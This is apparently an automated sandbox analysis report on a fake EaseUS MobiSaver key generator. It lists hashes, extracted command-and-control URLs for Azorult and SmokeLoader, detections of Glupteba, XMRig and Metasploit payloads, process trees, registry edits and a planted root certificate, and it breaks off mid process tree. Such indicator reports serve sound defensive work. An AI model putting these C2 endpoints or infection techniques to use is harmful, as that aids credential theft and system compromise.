Analysis
-
max time kernel
16s -
max time network
303s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 21:07
Static task
static1
Behavioral task
behavioral1
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Easeus.Mobisaver.3.5.key.generator.exe
Resource
win7v20201028
General
-
Target
Easeus.Mobisaver.3.5.key.generator.exe
-
Size
5.4MB
-
MD5
2a2be5dbf78e57ac4fd460faa2a52488
-
SHA1
8e0791500aeb17c4dc950e1a8c90d6036fb49d5b
-
SHA256
b66f057295395c28f1dd0d6807ac2c174885235d63ab3f3ff5b3d87719780228
-
SHA512
8715562e1b9e7c2357f95f3beb66383de7ec16d4dfbf7f0230a922ea420d27378e22ced50ee9d7e0da30a05bf269d5a07ca1a736b1b0828f3afbdfc8c10b9038
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5200-235-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5200-239-0x0000000005010000-0x000000000591A000-memory.dmp family_glupteba behavioral2/memory/5200-240-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/5372-184-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5372-188-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/5372-198-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5372-252-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
pid Process 4084 keygen-pr.exe 1832 keygen-step-1.exe 3048 keygen-step-3.exe 676 keygen-step-4.exe 4292 key.exe 4364 Setup.exe 4436 key.exe 3080 multitimer.exe 4604 setups.exe 192 askinstall20.exe 208 setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 208 setups.tmp 208 setups.tmp 208 setups.tmp 208 setups.tmp 208 setups.tmp 208 setups.tmp 208 setups.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 97 ipinfo.io 98 api.ipify.org 100 ipinfo.io 156 ip-api.com 283 ipinfo.io 174 api.ipify.org 279 ipinfo.io 435 api.ipify.org 472 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4292 set thread context of 4436 4292 key.exe 87 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
pid pid_target Process procid_target 5656 5160 WerFault.exe 141 6092 5160 WerFault.exe 141 5680 5160 WerFault.exe 141 5248 5160 WerFault.exe 141 4736 5160 WerFault.exe 141 1564 5160 WerFault.exe 141 5324 5160 WerFault.exe 141 6596 4536 WerFault.exe 165 4412 4536 WerFault.exe 165 6796 4536 WerFault.exe 165 5684 6624 WerFault.exe 246 6648 6624 WerFault.exe 246 5360 6624 WerFault.exe 246 4868 6624 WerFault.exe 246 6812 4536 WerFault.exe 165 1172 6624 WerFault.exe 246 5544 4536 WerFault.exe 165 3596 6624 WerFault.exe 246 7128 4536 WerFault.exe 165 3620 4536 WerFault.exe 165 5904 6624 WerFault.exe 246 6708 4536 WerFault.exe 165 3100 4484 WerFault.exe 154 6680 4536 WerFault.exe 165 8092 4536 WerFault.exe 165 6824 4536 WerFault.exe 165 6856 4536 WerFault.exe 165 7236 4536 WerFault.exe 165 -
Delays execution with timeout.exe 1 IoCs
pid Process 4372 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4456 taskkill.exe 6368 taskkill.exe 3868 taskkill.exe 6640 taskkill.exe -
Modifies registry class 45 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 9176 PING.EXE 2572 PING.EXE 1272 PING.EXE 5664 PING.EXE 376 PING.EXE -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 471 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 106 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 282 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 286 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 208 setups.tmp 208 setups.tmp -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 4364 Setup.exe Token: SeCreateTokenPrivilege 192 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 192 askinstall20.exe Token: SeLockMemoryPrivilege 192 askinstall20.exe Token: SeIncreaseQuotaPrivilege 192 askinstall20.exe Token: SeMachineAccountPrivilege 192 askinstall20.exe Token: SeTcbPrivilege 192 askinstall20.exe Token: SeSecurityPrivilege 192 askinstall20.exe Token: SeTakeOwnershipPrivilege 192 askinstall20.exe Token: SeLoadDriverPrivilege 192 askinstall20.exe Token: SeSystemProfilePrivilege 192 askinstall20.exe Token: SeSystemtimePrivilege 192 askinstall20.exe Token: SeProfSingleProcessPrivilege 192 askinstall20.exe Token: SeIncBasePriorityPrivilege 192 askinstall20.exe Token: SeCreatePagefilePrivilege 192 askinstall20.exe Token: SeCreatePermanentPrivilege 192 askinstall20.exe Token: SeBackupPrivilege 192 askinstall20.exe Token: SeRestorePrivilege 192 askinstall20.exe Token: SeShutdownPrivilege 192 askinstall20.exe Token: SeDebugPrivilege 192 askinstall20.exe Token: SeAuditPrivilege 192 askinstall20.exe Token: SeSystemEnvironmentPrivilege 192 askinstall20.exe Token: SeChangeNotifyPrivilege 192 askinstall20.exe Token: SeRemoteShutdownPrivilege 192 askinstall20.exe Token: SeUndockPrivilege 192 askinstall20.exe Token: SeSyncAgentPrivilege 192 askinstall20.exe Token: SeEnableDelegationPrivilege 192 askinstall20.exe Token: SeManageVolumePrivilege 192 askinstall20.exe Token: SeImpersonatePrivilege 192 askinstall20.exe Token: SeCreateGlobalPrivilege 192 askinstall20.exe Token: 31 192 askinstall20.exe Token: 32 192 askinstall20.exe Token: 33 192 askinstall20.exe Token: 34 192 askinstall20.exe Token: 35 192 askinstall20.exe Token: SeDebugPrivilege 4456 taskkill.exe Token: SeDebugPrivilege 3080 multitimer.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4604 setups.exe 208 setups.tmp 1824 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 58 IoCs
description pid Process procid_target PID 4636 wrote to memory of 3284 4636 Easeus.Mobisaver.3.5.key.generator.exe 78 PID 4636 wrote to memory of 3284 4636 Easeus.Mobisaver.3.5.key.generator.exe 78 PID 4636 wrote to memory of 3284 4636 Easeus.Mobisaver.3.5.key.generator.exe 78 PID 3284 wrote to memory of 4084 3284 cmd.exe 81 PID 3284 wrote to memory of 4084 3284 cmd.exe 81 PID 3284 wrote to memory of 4084 3284 cmd.exe 81 PID 3284 wrote to memory of 1832 3284 cmd.exe 82 PID 3284 wrote to memory of 1832 3284 cmd.exe 82 PID 3284 wrote to memory of 1832 3284 cmd.exe 82 PID 3284 wrote to memory of 3048 3284 cmd.exe 83 PID 3284 wrote to memory of 3048 3284 cmd.exe 83 PID 3284 wrote to memory of 3048 3284 cmd.exe 83 PID 3284 wrote to memory of 676 3284 cmd.exe 84 PID 3284 wrote to memory of 676 3284 cmd.exe 84 PID 3284 wrote to memory of 676 3284 cmd.exe 84 PID 4084 wrote to memory of 4292 4084 keygen-pr.exe 85 PID 4084 wrote to memory of 4292 4084 keygen-pr.exe 85 PID 4084 wrote to memory of 4292 4084 keygen-pr.exe 85 PID 676 wrote to memory of 4364 676 keygen-step-4.exe 86 PID 676 wrote to memory of 4364 676 keygen-step-4.exe 86 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 4292 wrote to memory of 4436 4292 key.exe 87 PID 3048 wrote to memory of 4420 3048 keygen-step-3.exe 89 PID 3048 wrote to memory of 4420 3048 keygen-step-3.exe 89 PID 3048 wrote to memory of 4420 3048 keygen-step-3.exe 89 PID 4420 wrote to memory of 2572 4420 cmd.exe 91 PID 4420 wrote to memory of 2572 4420 cmd.exe 91 PID 4420 wrote to memory of 2572 4420 cmd.exe 91 PID 4364 wrote to memory of 3080 4364 Setup.exe 92 PID 4364 wrote to memory of 3080 4364 Setup.exe 92 PID 4364 wrote to memory of 4604 4364 Setup.exe 94 PID 4364 wrote to memory of 4604 4364 Setup.exe 94 PID 4364 wrote to memory of 4604 4364 Setup.exe 94 PID 676 wrote to memory of 192 676 keygen-step-4.exe 95 PID 676 wrote to memory of 192 676 keygen-step-4.exe 95 PID 676 wrote to memory of 192 676 keygen-step-4.exe 95 PID 4604 wrote to memory of 208 4604 setups.exe 96 PID 4604 wrote to memory of 208 4604 setups.exe 96 PID 4604 wrote to memory of 208 4604 setups.exe 96 PID 192 wrote to memory of 3132 192 askinstall20.exe 97 PID 192 wrote to memory of 3132 192 askinstall20.exe 97 PID 192 wrote to memory of 3132 192 askinstall20.exe 97 PID 3132 wrote to memory of 4456 3132 cmd.exe 99 PID 3132 wrote to memory of 4456 3132 cmd.exe 99 PID 3132 wrote to memory of 4456 3132 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Easeus.Mobisaver.3.5.key.generator.exe"C:\Users\Admin\AppData\Local\Temp\Easeus.Mobisaver.3.5.key.generator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4292 -
